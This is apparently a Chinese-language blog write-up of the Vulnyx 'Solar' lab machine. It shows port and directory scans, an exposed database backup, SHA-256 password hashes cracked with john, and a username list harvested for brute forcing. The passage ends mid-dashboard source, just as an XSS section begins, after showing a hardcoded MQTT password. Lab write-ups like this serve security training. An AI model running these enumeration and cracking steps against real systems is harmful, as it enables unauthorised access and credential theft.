{"id":928,"date":"2026-01-03T15:15:33","date_gmt":"2026-01-03T07:15:33","guid":{"rendered":"http:\/\/162.14.82.114\/?p=928"},"modified":"2026-01-03T15:15:33","modified_gmt":"2026-01-03T07:15:33","slug":"vulnyx-%e3%83%bc%e3%80%83solar","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/928\/01\/03\/2026\/","title":{"rendered":"Vulnyx (\u00b0\u30fc\u00b0\u3003)Solar"},"content":{"rendered":"

(\u00b0\u30fc\u00b0\u3003)Solar<\/h1>\n
\n

\u542c\u8bf4\u8fd9\u662f\u4e00\u53f0\u8d85\u7ea7\u590d\u6742\u7684\u9776\u673a\uff0c\u597d\u4e45\u6ca1\u505a\u9776\u673a\u4e86\uff0c\u770b\u4e00\u4e0b\u8fd9\u4e2a\u9776\u673a\u6709\u591a\u590d\u6742\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n<\/blockquote>\n

\"image-20260102120504842\"<\/div>
\n
\"image-20260102120836081\"<\/div>
\n
\"image-20260102120951177\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Solar]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n0day was here \u2665\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.1.108:22\nOpen 192.168.1.108:80\nOpen 192.168.1.108:443\n[~] Starting Script(s)\n[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sCV" on ip 192.168.1.108\nDepending on the complexity of the script, results may take some time to appear.\n[~] Starting Nmap 7.95 ( https:\/\/nmap.org ) at 2026-01-01 23:11 EST\nNSE: Loaded 157 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 23:11\nCompleted NSE at 23:11, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 23:11\nCompleted NSE at 23:11, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 23:11\nCompleted NSE at 23:11, 0.00s elapsed\nInitiating ARP Ping Scan at 23:11\nScanning 192.168.1.108 [1 port]\nCompleted ARP Ping Scan at 23:11, 0.06s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 23:11\nCompleted Parallel DNS resolution of 1 host. at 23:11, 0.00s elapsed\nDNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating SYN Stealth Scan at 23:11\nScanning anonymous (192.168.1.108) [3 ports]\nDiscovered open port 443\/tcp on 192.168.1.108\nDiscovered open port 80\/tcp on 192.168.1.108\nDiscovered open port 22\/tcp on 192.168.1.108\nCompleted SYN Stealth Scan at 23:11, 0.04s elapsed (3 total ports)\nInitiating Service scan at 23:11\nScanning 3 services on anonymous (192.168.1.108)\nCompleted Service scan at 23:11, 12.24s elapsed (3 services on 1 host)\nNSE: Script scanning 192.168.1.108.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 23:11\nCompleted NSE at 23:11, 0.78s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 23:11\nCompleted NSE at 23:11, 1.21s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 23:11\nCompleted NSE at 23:11, 0.00s elapsed\nNmap scan report for anonymous (192.168.1.108)\nHost is up, received arp-response (0.0010s latency).\nScanned at 2026-01-01 23:11:07 EST for 14s\n\nPORT    STATE SERVICE  REASON         VERSION\n22\/tcp  open  ssh      syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)\n| ssh-hostkey: \n|   256 00:31:c1:0a:8b:0f:c9:45:e7:2f:7f:06:0c:4f:cb:42 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBBCfKYiX0XS6Bbc24efX4FcBNZhVZRq49IZpDO1CBBFeHsYyaa2KB\/ato4Retzm6mePIKD2q+AD9PP4VC79I7s=\n|   256 6b:04:c5:5d:39:ed:b3:41:d0:23:2b:77:d1:53:d0:48 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE1RWzu6r\/g8tuNndoouxbD5FvlSQOnWDDn6ufvEo06d\n80\/tcp  open  http     syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))\n|_http-title: Site doesn't have a title (text\/html).\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-server-header: Apache\/2.4.62 (Debian)\n443\/tcp open  ssl\/http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))\n|_http-title: Solar Energy Control Login\n|_http-server-header: Apache\/2.4.62 (Debian)\n|_http-favicon: Unknown favicon MD5: 20294B7D37E757C2C664F3B09517A470\n| ssl-cert: Subject: commonName=www.solar.nyx\/organizationName=Solar\/stateOrProvinceName=Madrid\/countryName=ES\/localityName=Madrid\/organizationalUnitName=IT\n| Subject Alternative Name: DNS:www.solar.nyx, DNS:www.sunfriends.nyx\n| Issuer: commonName=www.solar.nyx\/organizationName=Solar\/stateOrProvinceName=Madrid\/countryName=ES\/localityName=Madrid\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2024-10-10T00:03:30\n| Not valid after:  2034-10-08T00:03:30\n| MD5:   0a03:37bc:7f92:a9e5:b79c:98d9:f9e6:0835\n| SHA-1: e414:cf4d:d8d3:43a3:748e:c90c:0ce9:f713:e88d:138b\n| -----BEGIN CERTIFICATE-----\n| MIIDpTCCAo2gAwIBAgIUR6TZBu1Gr7CmOLmGXDd5PJGPpy8wDQYJKoZIhvcNAQEL\n| BQAwZDELMAkGA1UEBhMCRVMxDzANBgNVBAgMBk1hZHJpZDEPMA0GA1UEBwwGTWFk\n| cmlkMQ4wDAYDVQQKDAVTb2xhcjELMAkGA1UECwwCSVQxFjAUBgNVBAMMDXd3dy5z\n| b2xhci5ueXgwHhcNMjQxMDEwMDAwMzMwWhcNMzQxMDA4MDAwMzMwWjBkMQswCQYD\n| VQQGEwJFUzEPMA0GA1UECAwGTWFkcmlkMQ8wDQYDVQQHDAZNYWRyaWQxDjAMBgNV\n| BAoMBVNvbGFyMQswCQYDVQQLDAJJVDEWMBQGA1UEAwwNd3d3LnNvbGFyLm55eDCC\n| ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAN\/zD8zMKPmhYZSo3SWuBR3n\n| 6jF5HhHzz12Wm\/v5jbvO3N6yktQppec4u\/SDyaJ0YD46D9eQRWym\/Ug3Bg\/D5p63\n| 0qBAG\/WKyPCiSYfgRT+O6eGJwMprjP5fs5Np0mWgSmwy43E2RwFtqGNoCv45cRVM\n| NCzc6buuksOVl+IBVO6ldP51lHW781PxTx7+XCgLRrWBuoTTwWoH0K6KCEEdc6Th\n| FeFHI6FkFpgn9XG5Tj3dKLKctQasG25n06BR3vvvSoE1WWQgo4lBSQKEq3bD8Fpg\n| MpiY7Lk8KoWDIfAmk9EokEb9SrGrVgcEbRbccdjalZ6DIBx31PncWUJoSt4HQgUC\n| AwEAAaNPME0wLAYDVR0RBCUwI4INd3d3LnNvbGFyLm55eIISd3d3LnN1bmZyaWVu\n| ZHMubnl4MB0GA1UdDgQWBBSyqUP\/KMyh7e+m53EzgWrJB0TgcDANBgkqhkiG9w0B\n| AQsFAAOCAQEAlG0044X12UOSc5AJR9vTUL6wgcdckF8dFfw3DM+iIxNuPldtSKj0\n| BWqW9LipaNskxG8ltHhomm\/k9PeB3O+EuXGELkpm1KPMFtHx8QHlMsyI4tSMRYp\/\n| XuSrP5lbAOjJDrZd57Ib4rE9HShtMpA3qM+5yLTJJSTaFtqqIlAMfVv5w4Iuau9c\n| FB3qTgakZ1z2Aoa+jURRH7oob7t7iGUd6lrvg78Yooxx+SP+\/NoY0\/cbfLQK1Vko\n| g12FLYSi0ut9XReyxLZZXG9c3RBTBeUvF2NN3D+KiBXQ7m0Xm1TVhPrVmTlzmqKA\n| sGaU3ev4Gs9w6tNcbr4uK7w1uz71yY3CIw==\n|_-----END CERTIFICATE-----\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_ssl-date: TLS randomness does not represent time\n| tls-alpn: \n|_  http\/1.1\nMAC Address: 08:00:27:18:8D:4B (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u6ce8\u610f\u5230\u4e86\u4e24\u4e2adns\u89e3\u6790\uff1a<\/p>\n
Subject Alternative Name: DNS:www.solar.nyx, DNS:www.sunfriends.nyx<\/code><\/pre>\n
\u6dfb\u52a0\u5230\/etc\/hosts<\/code><\/p>\n
192.168.1.108     www.solar.nyx  www.sunfriends.nyx<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Solar]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,zip\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.1.108\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,html,zip\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 278]\n\/.html                (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 455]\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u518d\u626b\u4e00\u4e0bdns\u89e3\u6790\u7684\u90a3\u4fe9\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Solar]\n\u2514\u2500$ gobuster dir -u http:\/\/www.solar.nyx -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html    \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/www.solar.nyx\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/index.html           (Status: 200) [Size: 455]\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u65e0\u529f\u800c\u8fd4\uff0c\u8fd9\u662f\u5f88\u6b63\u5e38\u7684\uff0c\u5c1d\u8bd5\u8bbf\u95ee\u76ee\u6807IP\u53d1\u73b0\u8fdb\u884c\u4e86\u8df3\u8f6c\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Solar]\n\u2514\u2500$ curl -i http:\/\/192.168.1.108\nHTTP\/1.1 200 OK\nDate: Fri, 02 Jan 2026 04:30:46 GMT\nServer: Apache\/2.4.62 (Debian)\nLast-Modified: Wed, 09 Oct 2024 23:35:10 GMT\nETag: "1c7-62413b4741ff1"\nAccept-Ranges: bytes\nContent-Length: 455\nVary: Accept-Encoding\nContent-Type: text\/html\n\n<!DOCTYPE html PUBLIC "-\/\/W3C\/\/DTD XHTML 1.0 Transitional\/\/EN" "http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-transitional.dtd">\n<html xmlns="http:\/\/www.w3.org\/1999\/xhtml">\n  <head>\n    <meta http-equiv="Content-Type" content="text\/html; charset=UTF-8" \/>\n    <meta http-equiv="refresh" content="1;url=https:\/\/www.solar.nyx\/">\n    <meta name="robots" content="noindex">\n    <link rel="canonical" href="https:\/\/www.solar.nyx\/">\n  <\/head>\n  <body><\/body>\n<\/html><\/code><\/pre>\n
\u52a0\u5165-k<\/code>\u9009\u9879\u91cd\u65b0\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Solar]\n\u2514\u2500$ gobuster dir -u https:\/\/www.solar.nyx -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html -k\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     https:\/\/www.solar.nyx\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 279]\n\/index.php            (Status: 200) [Size: 745]\n\/.html                (Status: 403) [Size: 279]\n\/login.php            (Status: 200) [Size: 0]\n\/logout.php           (Status: 302) [Size: 0] [--> index.php?msg=Log-out.]\n\/dashboard.php        (Status: 302) [Size: 0] [--> index.php]\n\/records              (Status: 301) [Size: 318] [--> https:\/\/www.solar.nyx\/records\/]\n\/session.php          (Status: 200) [Size: 0]\n\/.html                (Status: 403) [Size: 279]\n\/.php                 (Status: 403) [Size: 279]\n\/server-status        (Status: 403) [Size: 279]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u540c\u7406\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Solar]\n\u2514\u2500$ gobuster dir -u https:\/\/www.sunfriends.nyx -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html -k\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     https:\/\/www.sunfriends.nyx\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 284]\n\/.html                (Status: 403) [Size: 284]\n\/index.php            (Status: 200) [Size: 11089]\n\/server.php           (Status: 200) [Size: 1523]\n\/commands             (Status: 301) [Size: 329] [--> https:\/\/www.sunfriends.nyx\/commands\/]\n\/.php                 (Status: 403) [Size: 284]\n\/.html                (Status: 403) [Size: 284]\n\/server-status        (Status: 403) [Size: 284]\nProgress: 882240 \/ 882244 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u51c6\u5907\u5de5\u4f5c\u7ed3\u675f\u4e86\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\u5148\u770b\u4e00\u4e0bwww.solar.nyx<\/code><\/p>\n
\"image-20260102123634231\"<\/div><\/p>\n
\u5c1d\u8bd5\u4e00\u4e0b\u7b80\u5355\u7684\u4e07\u80fd\u5bc6\u7801\u53d1\u73b0\u65e0\u679c\uff0c\u7b49\u770b\u4e00\u4e0b\u654f\u611f\u76ee\u5f55\uff0c\u5982\u679c\u6ca1\u529e\u6cd5\u518d\u8003\u8651sql<\/code>\u6ce8\u5165\uff0c\u7248\u672c\u6f0f\u6d1e\uff0c\u7206\u7834\u4e4b\u7c7b\u7684\uff0c\u518d\u770b\u4e00\u4e0bhttps:\/\/www.sunfriends.nyx\/<\/code>\uff1a<\/p>\n
\"image-20260102130253719\"<\/div><\/p>\n
\u89e3\u6cd51\uff1a\u654f\u611f\u76ee\u5f55 => \u6570\u636e\u5e93<\/h3>\n
\u770b\u4e00\u4e0b\u90a3\u4e9b\u654f\u611f\u76ee\u5f55\uff1a<\/p>\n
\"image-20260102124340819\"<\/div><\/p>\n
\u6ca1\u5565\u7528\uff0c\u6ce8\u610f\u5230www.sunfriends.nyx<\/code>\u4e0a\u9762\u5199\u7684\u5185\u5bb9\uff1a<\/p>\n
The forum is temporarily unavailable due to maintenance on the server.\n\u7531\u4e8e\u670d\u52a1\u5668\u7ef4\u62a4\uff0c\u8bba\u575b\u6682\u65f6\u65e0\u6cd5\u8bbf\u95ee\u3002\nWe apologize for the inconvenience.\n\u5bf9\u4e8e\u7ed9\u60a8\u5e26\u6765\u7684\u4e0d\u4fbf\uff0c\u6211\u4eec\u6df1\u8868\u6b49\u610f\u3002<\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u6a21\u7cca\u6d4b\u8bd5\uff0c\u67e5\u770b\u662f\u5426\u53ef\u4ee5\u627e\u5230\u5907\u4efd\u6570\u636e\u5e93\u6216\u8005\u5176\u4ed6\u6587\u4ef6<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Solar]\n\u2514\u2500$ gobuster dir -u https:\/\/www.sunfriends.nyx -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x bak,old,orig,backup,save,sql,sql.gz,sql.bz2,sql.xz,dump,psql,mdb,accdb,ibd,frm,sqlite,db,db3,tar.gz,tgz,tar.bz2,tar.xz,zip,7z,tmp,temp,swp,swo -k                            \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     https:\/\/www.sunfriends.nyx\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              save,accdb,sqlite,db3,tar.bz2,7z,orig,backup,sql.xz,psql,db,tgz,zip,tmp,old,sql.bz2,dump,ibd,frm,swp,swo,bak,sql,sql.gz,mdb,tar.gz,tar.xz,temp\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/database.sql.gz      (Status: 200) [Size: 1010]<\/code><\/pre>\n
\u627e\u5230\u4e86\u4e00\u4e2a\u6587\u4ef6\uff0c\u4e0b\u8f7d\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Solar]\n\u2514\u2500$ wget --no-check-certificate https:\/\/www.sunfriends.nyx\/database.sql.gz\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Solar]\n\u2514\u2500$ gunzip -c database.sql.gz             \n-- MariaDB dump 10.19  Distrib 10.11.6-MariaDB, for debian-linux-gnu (x86_64)\n--\n-- Host: localhost    Database: solar_energy_db\n-- ------------------------------------------------------\n-- Server version       10.11.6-MariaDB-0+deb12u1\n\n\/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION *\/;\n\/*!40101 SET NAMES utf8mb4 *\/;\n\/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE *\/;\n\/*!40103 SET TIME_ZONE='+00:00' *\/;\n\/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 *\/;\n\/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 *\/;\n\/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' *\/;\n\/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 *\/;\n\n--\n-- Table structure for table `users`\n--\n\nDROP TABLE IF EXISTS `users`;\n\/*!40101 SET @saved_cs_client     = @@character_set_client *\/;\n\/*!40101 SET character_set_client = utf8 *\/;\nCREATE TABLE `users` (\n  `id` int(11) NOT NULL AUTO_INCREMENT,\n  `username` varchar(50) NOT NULL,\n  `password` varchar(64) NOT NULL,\n  `role` varchar(20) NOT NULL,\n  PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;\n\/*!40101 SET character_set_client = @saved_cs_client *\/;\n\n--\n-- Dumping data for table `users`\n--\n\nLOCK TABLES `users` WRITE;\n\/*!40000 ALTER TABLE `users` DISABLE KEYS *\/;\nINSERT INTO `users` VALUES\n(1,'Robert24','66dc8ac996672de0cdeb294808d4cca21ba0bc856c365e90562565853febed0c','user'),\n(2,'calvin','e8e9689deac5bac977b64e85c1105bd1419608f1223bdafb8e5fbdf6cf939879','user'),\n(3,'JulianAdm','bbca1b30190fddeead4e1a845ee063bec94499601aa5ee795da8917767bdcdde','admin'),\n(4,'John20','38858f3066c9a6f3d8c6e54fbfcff204d5383f0721c32bc8ae46cf46a93e3694','user');\n\/*!40000 ALTER TABLE `users` ENABLE KEYS *\/;\nUNLOCK TABLES;\n\/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE *\/;\n\n\/*!40101 SET SQL_MODE=@OLD_SQL_MODE *\/;\n\/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS *\/;\n\/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS *\/;\n\/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT *\/;\n\/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS *\/;\n\/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION *\/;\n\/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES *\/;\n\n-- Dump completed on 2024-08-24 21:17:08<\/code><\/pre>\n
\u53d1\u73b0\u4e86\u4e00\u4e9b\u6709\u610f\u601d\u7684hash\uff1a<\/p>\n
Robert24:66dc8ac996672de0cdeb294808d4cca21ba0bc856c365e90562565853febed0c\ncalvin:e8e9689deac5bac977b64e85c1105bd1419608f1223bdafb8e5fbdf6cf939879\nJulianAdm:bbca1b30190fddeead4e1a845ee063bec94499601aa5ee795da8917767bdcdde\nJohn20:38858f3066c9a6f3d8c6e54fbfcff204d5383f0721c32bc8ae46cf46a93e3694<\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u7834\u89e3\uff0c\u8fd9\u662f\u4e00\u4e2a 64 \u4f4d\u5341\u516d\u8fdb\u5236\u5b57\u7b26\u4e32<\/strong>\uff0c\u5373 256 \u4f4d\uff0832 \u5b57\u8282\uff09<\/strong> \u7684\u8f93\u51fa\uff08\u662f SHA-256<\/strong> \u54c8\u5e0c\u7b97\u6cd5\u7684\u5178\u578b\u7279\u5f81\uff09<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Solar]\n\u2514\u2500$ john --format=raw-sha256 --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash           \nUsing default input encoding: UTF-8\nLoaded 4 password hashes with no different salts (Raw-SHA256 [SHA256 128\/128 SSE2 4x])\nWarning: poor OpenMP scalability for this hash type, consider --fork=4\nWill run 4 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nemily            (calvin)     \n1g 0:00:00:01 DONE (2026-01-02 00:09) 0.7462g\/s 10703Kp\/s 10703Kc\/s 32136KC\/s (454579)..*7\u00a1Vamos!\nUse the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n
\u5f97\u5230\u4e00\u4e2a\u5bc6\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff0c\u53d1\u73b0\u6210\u529f\uff1a<\/p>\n
calvin:emily<\/code><\/pre>\n
\"image-20260102131053228\"<\/div><\/p>\n
\u6ce8\u610f\u5230cookie\uff1a<\/p>\n
\"image-20260102153922399\"<\/div><\/p>\n
\u89e3\u6cd52\uff1a\u4fe1\u606f\u641c\u96c6+\u7206\u7834<\/h3>\n
\u5728\u7fa4\u4e3b\u89c6\u9891<\/a>\u4e2d\u770b\u5230\u7684\u89e3\u6cd5\uff0c\u4f7f\u7528\u6b63\u5219\u8fdb\u884c\u63d0\u53d6\uff0c\u518d\u8fdb\u884c\u7206\u7834\uff0c\u540c\u6837\u4f18\u96c5\uff0c\u4e14\u66f4\u5bb9\u6613\u88ab\u4eba\u60f3\u5230\uff0c\u8fd9\u4e2a\u6b63\u5219\u662f\u7528AI\u76f4\u63a5\u5199\u7684\uff0c\u5f88\u65b9\u4fbf\u4e14\u6bd4\u6211\u7684\u5b9e\u73b0\u65b9\u6cd5\u66f4\u4f18\u96c5\uff08\u72d7\u5934\u4fdd\u547d.jpg\uff09\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Solar]\n\u2514\u2500$ curl -sk https:\/\/www.sunfriends.nyx\/ | grep username | sort -u                                  \n                    <div class="username">AnnaSolar<\/div>\n                    <div class="username">calvin<\/div>\n                    <div class="username">EcoFriendly<\/div>\n                    <div class="username">GreenThumb<\/div>\n                    <div class="username">John20<\/div>\n                    <div class="username">JulianAdm<\/div>\n                    <div class="username">Robert24<\/div>\n                    <div class="username">SolarGuy<\/div>\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Solar]\n\u2514\u2500$ curl -sk https:\/\/www.sunfriends.nyx\/ | grep -oP '<div class="username">\\K[^<]+' | sort -u\nAnnaSolar\ncalvin\nEcoFriendly\nGreenThumb\nJohn20\nJulianAdm\nRobert24\nSolarGuy<\/code><\/pre>\n
\u7136\u540e\u4f7f\u7528burpsuite<\/code>\u8fdb\u884c\u7206\u7834\u5373\u53ef\uff01\uff01\uff01\u5bf9\u4e86\uff0c\u524d\u63d0\u662f\u5b57\u5178\u91cc\u6709\u8fd9\u4e2a\u5bc6\u7801\u54e6\u3002<\/p>\n
XSS\u6f0f\u6d1e\u5229\u7528<\/h3>\n
\u67e5\u770b\u4e00\u4e0bdashboard.php<\/code>\u6e90\u4ee3\u7801\uff1a<\/p>\n
<!DOCTYPE html>\n<html lang="en">\n\n<head>\n    <meta charset="UTF-8">\n    <meta name="viewport" content="width=device-width, initial-scale=1.0">\n    <title>Solar Energy Dashboard<\/title>\n    <link rel="stylesheet" href="\/style.css">\n    <link rel="stylesheet" href="\/style2.css">\n<\/head>\n\n<body>\n    <div class="dashboard">\n        <object class="solar-icon" data="sun.svg" type="image\/svg+xml" style="width:75px;"><\/object>\n        <h1>Solar Energy Dashboard<\/h1>\n        <div class="user-info" id="userInfo"><span>User Name<\/span><br>Role<\/div>\n        <canvas id="energyChart" class="energy-chart"><\/canvas>\n        <div class="energy-label"><span class="solar-title">Solar:<\/span> <span id="solarEnergyLabel"\n                class="energy-value solar">0 kWh<\/span><\/div>\n        <div class="energy-label"><span class="consumed-title">Consumed:<\/span> <span id="consumedEnergyLabel"\n                class="energy-value consumed">0 kWh<\/span><\/div>\n        <div class="energy-label"><span class="grid-title">Grid:<\/span> <span id="gridEnergyLabel"\n                class="energy-value grid-positive">0 kWh<\/span><\/div>\n        <a href="\/logout.php" class="logout-link" id="logoutLink">Logout<\/a>\n            <\/div>\n\n    <!--<script src="\/mqtt.min.js"><\/script>-->\n\n    <script src="\/chart.js"><\/script>\n    <script type="module">\n        import mqtt from '\/mqtt.js'\n\n        let userName = "calvin";\n        let userRole = "user";\n\n        var mqttclient = mqtt.connect('wss:\/\/www.solar.nyx\/wss\/', {                        \n            clientId: userName + '-dashboard-' + new Date().valueOf(),       \n            username: 'user',\n            password: '1tEa15klQpTx9Oub6ENG',\n            protocolId: 'MQTT'\n        });\n\n        mqttclient.on("message", getMessagesStatus);\n\n        function getMessagesStatus(msTopic, msBody) {\n            let data = JSON.parse(msBody.toString());\n            setParams(data.solarEnergy, data.consumedEnergy);\n        }\n\n        mqttclient.subscribe("data", function (err) {\n            if (err) {\n                console.log('ERROR MQTT', err.toString());\n                mqttclient.end();\n            }\n        });\n\n        let solar = 0, consumed = 0, grid = 0;\n\n        \/\/ Initialize the bar 